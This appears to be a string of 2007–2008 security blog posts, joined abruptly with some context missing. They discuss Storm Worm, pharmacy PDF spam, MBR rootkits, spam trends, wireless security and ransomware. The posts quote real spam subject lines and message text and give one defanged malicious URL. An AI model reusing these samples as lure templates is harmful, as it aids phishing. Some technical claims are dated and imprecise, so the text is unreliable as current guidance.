The article goes into detail on the difficulties of extradition to the United States if American officials request it so I won't belabor that point here.

What is important is whether or not this could mean the end of the Storm Worm? Unfortunately not. We already know from research done by Joe Stewart that recent variants of the Storm Worm are using a key to encrypt their P2P traffic basically segregating the network into chunks that use this same key to communicate. This means that these portions of the botnet could be sold off and used for whatever purposes the buyer wanted to use them for: more spam, different malware, etc. If the Storm Worm code is also made available, then there is nothing stopping Storm from living on.

Even scarier is the notion that we have seen the evolution of malware and it only gets nastier and nastier with one idea building off the previous. So, even if we don't see additional specific Storm Worm variants if/when the authors are arrested, the concepts and code will certainly live on and take on new shapes in the next popular malware strains.

No matter how much education you do on security best practices and even if 99.99% of your company follows those practices, it only takes one person making one mistake to cause a potential breach. Although some data breaches are the result of large scale infrastructure weaknesses, a large number of them are also the result of the indiscretion of one person. One person who didn't properly secure an open PC or who didn't properly secure a hard drive with sensitive data can cause the loss of millions of records which can result in untold numbers of identity thefts!

We've said this before, but I absolutely believe it to be 100% true: protect your personal information and monitor your bank accounts and credit cards like the data has already been compromised (because it likely has. The real question is whether or not someone is going to use YOURS). As with many things in life, early detection gives you the best possibility of recovery. You may not be able to prevent damage to your credit or reputation from happening, but there is a lot we can do to mitigate it once it happens.

Some of the sample subject lines that we have seen from this new Storm variant include:

-- why you're so unhappy with your bedroom life?

-- Ladies and Gents want to have perfect nights!

-- Become a super-lover-2008!

-- What you will learn from us will change your sensual life for better!

All of the samples that we have received have had one-liner spam where the message body is sometimes the same as the subject line (many times not) followed by a URL pointing to a random IP address like hxxp://61,79,172,152/rqokyj/ (modified so you can't actually click the link).

As if we don't see enough health related spam already, now Storm has jumped on the bandwagon as well. I guess if it works for the spammers...

Today's wave is relatively small (less than 0.5% of spam volume) in comparison with the penetration that we saw back in mid-2007, but PDF spam has been almost completely non-existent since it waned back in late August.

Below is some information related to this latest threat:

-- Subject lines look like poorly translated pill/enhancement advertisements. Some example subjects include "Just out pills, read an email" and "Never-seen pills, overwhelmingly important statement"

-- Message bodies are short pill based advertisements (original PDF spam had empty message body content). Most are similar to this example:

Hello,

Very Inexpensive Ph0ramcy for low price. pay attention to the attachment PDF file.

See you!

-- Attachment names also follow this same theme. Attachment names like pill.pdf, pills.pdf, medicine.pdf, and drug.pdf have been seen by our systems.

The actual PDF attachment is a one page, text based PDF. The first 3 lines of which contain an additional advertisement such as

Best Offer of Pharmacy Products here: We are waiting for you here: http://PowerMadXmas.com Low Prices, Fast Delivery, and Discreet Package.

(URL above is random)

The next three-quarters of the page contains random word salad unrelated to the actual pill spam. The bottom of the PDF contains text similar to what was found in the message body.

Whether this is a small blip on the radar or spammers looking to get back into PDF spam on a wide scale (not likely) remains to be seen, but PDF spam volumes having been near zero for the past 5 months, this is certainly an interesting development in a tactic that had gone completely dormant.

*** UPDATE 1 1/24/2008 4:20pm MST ***

We have some more PDF spam subject lines:

Best offer of pharmacy products Enjoy the newest medication Get the freshest drugs Enjoy the newest remedies Weighty pharmacy offer Major importance medications offer

These are only some of what we have seen, but the prevailing theme remains constant; more pill and drug spam.

Master Boot Record (MBR) viruses start when your computer's BIOS activates its master boot code (and here comes the key part) BEFORE the operating system loads.

So, why is this important?

Most of your Windows malware that contains a rootkit component will attach itself to one of your Windows device drivers. This means that these rootkits run after the operating system loads (or while it is loading, depending on the device driver). Rootkits that attach to your MBR do so BEFORE the operating system loads. This means that these rootkits are a lot stealthier and as such more difficult to detect, but also much more difficult to remove. Even if you uninstall your operating system, MBR rootkits will still remain on your system, even if the malware which installed the rootkit is removed.

We have hereby crossed the threshold into the next wave of malware as cyber criminals continue to make malware and rootkits less detectable more difficult to remediate.

It is this paradigm shift that has continuously evolved over the past 5 years. Over that time it has changed from phishing messages with bad grammar and easily identifiable methods for blocking to finely crafted, evolved social engineering and a full underground economy where phishing and malware kits are sold as a business with full technical support and free upgrades. A model similar to what is offered by many legitimate software companies.

It was a logical transition for the system to take where we moved from the for-recognition model of spam and malware attacks to the for-profit model, but it was SoBig that really jump started that entire movement. So when you see your next Paypal phish or drive by download, be sure to tip your glass to SoBig, the grandfather of it all.

A question that I am asked by a lot of people when they find out not only who I work for, but what my role is with the company is "Will the spam war ever be won?" That's always a difficult question to answer because the definition of spam keeps changing. This means the rules of engagement and the war itself also keeps changing. For example, the classic definition of spam that most people think of when they hear the moniker is the type that appears in your email inbox. Over the past couple of years as more and more internet technologies have increased in wide-scale usage we have been graced with other spam related acronyms/terms like SPIM (Spam over Instant Messenger), SPIT (Spam over Internet Telephony), vishing, smishing, and bacn (most recently). One of the Storm Worm variants even dabbled in popup spam where infected machines displayed a stock pump and dump scam via a web browser popup window.

I would say that certain parts of the spam war are being fought better than others (such as the fight for the inbox), but in other areas the abuse technology is so new and measures to find ways to fight it are in such nascent stages that they aren't all that effective. They'll certainly improve, but while the technology to fight the problem evolves, so also changes the ways in which the technologies are being abused.

The words "personal computer" and "Inbox" are becoming more and more ambiguous every day with the advancing technologies of smart phones, PDAs, and other communication devices. There is very little from a business productivity perspective that you cannot do on your mobile device anymore. As such more and more people are using their phones and PDAs just as they would use any laptop or desktop PC. This creates additional avenues for abuse. Spammers have been and will continue to look for new and inventive ways to latch onto and take advantage of any emerging technology whether that be SMS, network and browser popups, voicemail injection, instant messenger, or whatever real-time communication technology comes next. With those changes, so continues and evolves the fight against spam.

I certainly applaud the fact that he is starting to move through the judicial system and my hope is that he and his gang are put away for a very long time. From an industry perspective though my position is and always has been that arresting individual spammers doesn't make any tangible difference, however. Our mail servers won't be processing any less spam because Ralsky, Soloway, or any other "Spam King" is off the streets. There are always more spammers-to-be waiting in the wings behind them.

So as unfortunate as it is, don't expect to see any difference in the amount of spam ending up in your spam folders.

Today's blog entry is based off of an article posted by The Star Online which states that (when comparing the risks associated between wired and wireless networks) "the risks are the same as those posed to wired networks  the typical computer virus infection and odd worm-intrusion incident". Last I checked, worms and viruses, although significant risks in and of themselves, are far from the only risks facing wireless and wired networks.. What about the hacker next door who sets up a wireless sniffer to try to crack the encryption key used on your wireless network? Or the one who is just casually looking for completely open wireless networks to attach onto?

The article also states: "Whats even more interesting is that some of these organisations did not face any security threats and have found that the security of their networks either improved or remained unchanged when they moved to wireless" This has nothing to do with the deployment of wireless. There are three main encryption technologies used on wireless networks today: WEP (Wired Equivalency Protocol), WPA (Wi-Fi Protected Access), and WPA2 (version 2 of WPA) which actually consists of two versions: WPA2-Personal and WPA2-Enterprise. Nowhere in any of these acronyms is the word "security" used. Why? Because they do not provide "security". They provide encryption (which can be cracked) and some level of access control, but not "security". In this instance, as part of the deployment of wireless to the organization's internal network resources they may have employed some additional safeguards such as requiring authentication to a VPN after successful wireless connection, but this is an architectural change and is not related to the security of the wireless network.

The article also mentions that consumer-grade wireless networking equipment is less secure than enterprise grade equipment. Not true. Generally consumer and enterprise grade wireless access points support all of the current encryption protocols mentioned above. Unfortunately, not all of the equipment that is connecting to these access points (predominantly laptops) support these new protocols. This is especially true in organizations that deploy older, bargain basement type laptops whose internal wireless adapters may not even support encryption beyond basic WEP. Nevertheless, this is not a factor of the security of the access point. This is a factor of the capabilities of the machines connecting to the network. The security itself of the wireless access point is not lacking because it is a D-Link you bought for $75 from a local retailer versus a Cisco access point that may have cost several hundred.

Why am I being so hard on this article? Mainly because I keep hearing people trying to make the connection between wireless networks and security. In this case they are trying to make the connection between wireless deployment and _increased_ security! As I mentioned earlier, there are certainly some best practices that you can deploy as an organization if you are looking to go wireless, but again these are not security functions of the wireless network or the wireless network equipment itself, rather functions of your own architecture and safeguards put into place such that you limit what a potential criminal has access to even if they do manage to successfully get onto your wireless network.

Wireless is a wonderful technology and I am a big proponent of it (I use it all day between work and home), but wireless does not equal security. Please don't confuse the two!

Back in March, 2006 a worm named Cryzip was discovered. If your PC got infected with this worm it would look for files on your PC with certain extensions (.doc, .xls, and .zip, to name a few) on your C drive, encrypt them and leave a text file behind which described how you could get your files back if you paid a $300 "ransom" to an e-gold (anonymous online money transfer service) account.

This new trojan works a bit differently. The new ransomware effectively locks up your PC and demands that in order to get control back you must send $35 (apparently ransoms don't fetch what they used to) to get it back. The cyber criminals probably figured that the $35 figure was low enough such that people would feel that it was easy enough to pay.

The infected machine is also displays an error message window that has the title of "ERROR: Browser Security and Antiadware [sic] Software component license exprited [sic]" Funny...I didn't know my browser security could exprite! This window also tells you that surfing porn and adult sites without security software is "dangerows". Oh no! I don't know what "dangerows" is, but I am pretty certain I don't want any of it!

If you click to activate a new license in the error window you are presented with this window which displays a 1-900 number and a PIN to enter when you call (the cost of the call is $35).

The biggest weakness with Cryzip which used a low-grade encryption key which was actually posted online by security researchers which essentially rendered the trojan and its extortion technique useless. Maybe someone will pay the $35 to unlock their PC infected with this new trojan and post the cleaning instructions online? :)

2008 is expected to provide no relief to this trend either. Hang on and please keep your hands and feet inside the ride at all times!